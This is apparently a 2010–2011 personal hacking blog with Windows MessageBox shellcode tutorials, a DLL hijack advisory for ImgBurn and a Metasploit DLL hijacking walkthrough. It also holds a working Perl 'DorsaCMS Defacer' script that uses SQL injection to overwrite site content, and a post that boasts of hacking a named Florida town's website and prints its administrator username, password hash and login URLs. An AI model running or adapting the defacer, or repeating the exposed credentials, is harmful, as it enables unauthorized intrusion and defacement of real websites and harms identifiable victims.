╗╖(◄►)╓╔ d3c0der

Tuesday, May 31, 2011

simple windows shellcoding

in this post i want to learn a simple way to making shellcodes under v1nd0z operation system :D

debuggers can helping to a fast shellcoding and test our shellcodes
do you remember exe file injection method ? in this method we must be find a free code area in the exe file , we calls this area code cave .
in the code cave we can insert assembly instructions , and run it !
after inserting our codes , we must change the instruction pointer address to the beginning of our codes address

ok , i guess you understand the method that i want to use
let's go !

i want make a MessageBox shellcode that show d3c0der !
it is a simple code in assembly language :
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
MOV BYTE PTR SS:[EBP-7],64
MOV BYTE PTR SS:[EBP-6],33
MOV BYTE PTR SS:[EBP-5],63
MOV BYTE PTR SS:[EBP-4],30
MOV BYTE PTR SS:[EBP-3],64
MOV BYTE PTR SS:[EBP-2],65
MOV BYTE PTR SS:[EBP-1],72
push 0
LEA EBX,DWORD PTR SS:[EBP-7]
PUSH EBX
LEA ECX,DWORD PTR SS:[EBP-7]
PUSH ECX
push 0
MOV EAX,USER32.MessageBoxA
CALL EAX

for conversion your word ( that you want show by shellcode ) to hex , you can use this site :
http://centricle.com/tools/ascii-hex/
this is an axample of conversion the " d3c0der " word :

the codecave area :

now i insert this codes into the debugger :

the first instruction that i use is " xor eax,eax "
and this addres is : 01010D47 ( we use it for changing EIP )

take a look at the registers window , and see the instruction pointer address .

go to this address :

and replace the " push 60 " with " JMP 01010D47 "

now run the program , you can see the d3c0der message .

but there is a problem ! null bytes !
shellcodes must be free from null bytes !
wich part of our code , makes null bytes ?!
it is " push 0 "
we can use an old technique for remove null byte
by replacing " push 0 " with
xor ecx,ecx
push ecx
we can solve this problem , and our final shellcode is :

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
MOV BYTE PTR SS:[EBP-7],64
MOV BYTE PTR SS:[EBP-6],33
MOV BYTE PTR SS:[EBP-5],63
MOV BYTE PTR SS:[EBP-4],30
MOV BYTE PTR SS:[EBP-3],64
MOV BYTE PTR SS:[EBP-2],65
MOV BYTE PTR SS:[EBP-1],72
xor ecx,ecx
push ecx
LEA EBX,DWORD PTR SS:[EBP-7]
PUSH EBX
LEA ECX,DWORD PTR SS:[EBP-7]
PUSH ECX
xor ecx,ecx
push ecx
MOV EAX,USER32.MessageBoxA
CALL EAX

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
   
int main(){
      
    unsigned char shellcode[]=

/x33/xc0/x33/xdb/x33/xc9/x33/xd2/xc6/x45/xf9/x64/xc6/x45/xfa/x33/xc6/x45/xfb/x63/xc6/x45/xfc/x30/xc6/x45/xfd/x64/xc6/x45/xfe/x65/xc6/x45/xff/x72/x33/xc9/x51/x8d/x5d/xf9/x53/x8d/x4d/xf9/x51/x33/xc9/x51/xb8/xea/x07/x45/x7e/xff/xd0

printf("Size = %d bytes\n", strlen(shellcode));
   
    ((void (*)())shellcode)();
      
      
   
    return 0;
}

test it and enjoy !
good luck!

Tuesday, February 8, 2011

win32/xp pro sp3 MessageBox shellcode 11 bytes

windows MessageBox shellcode for service pack 3

This shellcode run MessageBox and show an error message

/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) 
website : Www.AttackerZ.ir
spt : All firends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
char code[] =   "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
 
int main(int argc, char **argv)
{
    ((void (*)())code)();
     
    return 0;
}

test :

http://shell-storm.org/shellcode/files/shellcode-751.php
http://packetstormsecurity.org/files/view/98261/mbwin32-shellcode.txt

Sunday, February 6, 2011

how hillsboro beach website hacked ?

few weeks ago i read a news on foxnews about an american website :

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

i logged in website and found the bug , in this post i want to show vulnerability of this site :d

let's go !
first , home page :

sql error :

number of selected column is incorrect :

show mysql version :

username and password :d :

user : tohbadministrator
pass : 481a91595db92d57

and login pages :
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

ImgBurn could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully qualified path to a dynamic-linked library (dwmapi.dll) when running on Microsoft Windows. By persuading a victim to open a specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a specially-crafted library to execute arbitrary code on the system.

CVE ID: 2011-0403 (see also: NVD)
Secunia Advisory ID: 42798
Bugtraq ID: 45657
ISS X-Force ID: 64478
osvdb : 70273
Packet Storm: 97207
security reason: WLB-2011010025
securitylab : 404029

IN THE NEWS :

https://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm

Saturday, December 18, 2010

Vulnerability Management for Dummies

Vulnerability Management for Dummies arms you with the facts and shows you how to implement a successful Vulnerability Management program. Whether your network consists of just a handful of computers or thousands of servers distributed around the world, this 5-part book will help:

Explain the critical need for Vulnerability Management (VM)
Detail the essential best-practice steps of a successful VM Program
Outline the various VM Solutions - including the pros & cons of each
Highlight the award-winning QualysGuard VM solution
Provide a 10-point checklist for removing vulnerabilities from your key resources

download

Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a cms that have certificate of security

u can see certificate of security from this link :
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

but i found a blind SQL Injection Vulnerability in this CMS
http://securityreason.com/exploitalert/9701
http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

exploit code(tested on windows xp ) :

#!/usr/bin/perl
#d3c0der
system('color a');
system('cls');
system('title DorsaCMS Defacer');
print q{
===================================================
-= ** =-
DorsaCMS Defacer

[+] Coded by d3c0der => d3c0der@hotmail.com

[+] AttackerZ Under Ground Group => wwW.Attackerz.iR
-= ** =-
===================================================

};

use HTTP::Request;
use LWP::UserAgent;

print "~# Target : ";
$site=<STDIN>;
chomp $site;
print "~# PageID : ";
$id=<STDIN>;
chomp $id;
print "~# Deface Text : ";
$def=<STDIN>;
chomp $def;

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";

print "->hacking : $site\n";

@path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

}

print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";

##
# By d3c0der
##

.

Tuesday, December 14, 2010

DLL Hijacking with Metasploit

Step 1: Fire up Metasploit Express and load the Exploit module

The module you are looking for is WEBDAV Application DLL Hijacker. It is currently in the 10 most recent disclosures as of September 14th 2010.

Step 2: Select your options. Here we are going to exploit Powerpoint! The module will create the file "HR.ppt" in the directory "TopSecret." When you are done setting your options, launch the attack.